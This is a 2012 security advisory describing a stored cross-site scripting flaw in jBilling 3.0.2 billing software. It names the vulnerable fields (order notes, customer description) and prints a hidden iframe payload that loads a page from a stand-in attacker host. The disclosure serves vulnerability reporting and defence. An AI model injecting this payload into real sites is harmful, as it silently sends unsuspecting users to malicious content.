# Exploit Title: jBilling 3.0.2 Cross Site Scripting Vulnerability
# Date: 11/23/2012
# Exploit Author: Woody Hughes <whughes@ingresssecurity.com>
# Vendor Homepage: http://www.jbilling.com
# Software Link: http://sourceforge.net/projects/jbilling/files/latest/download
# Version: 3.0.2
# Tested on: Ubuntu Linux

INGRES-11232012-jBilling 3.0.2 Cross Site Scripting Vulnerability
November 23, 2012

Ingress Security has found a cross site scripting vulnerability in the form of a cross site request forgery in the jBilling billing software.

jBilling's mission is to provide a robust, secure, open source alternative for enterprise billing. With our world-class service team, we help companies all over the world deploy and maintain billing solutions to meet their business needs.

jBilling 3.0.2





Cross Site Request Forgery (CSRF)
jBilling does not properly check user input, thus allowing the <iframe> tag to be used in a malicious manner. For example, an individual with Add User rights could add multiple users and when those users log in, the following <iframe> tag would send them to a malicious website hosting malicious content:

<iframe src=”http://attacker_host:4321/attack.html” height=”1” width=”1” style=”visibility: hidden;” />

The URLs that are affected are:


	Create a new order and in the notes section, input your malicious code.


	 Add a new customer by going to the URL above and enter their details. In the description box, input your malicious code.

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jBilling 3.0.2 Cross Site Scripting Vulnerability

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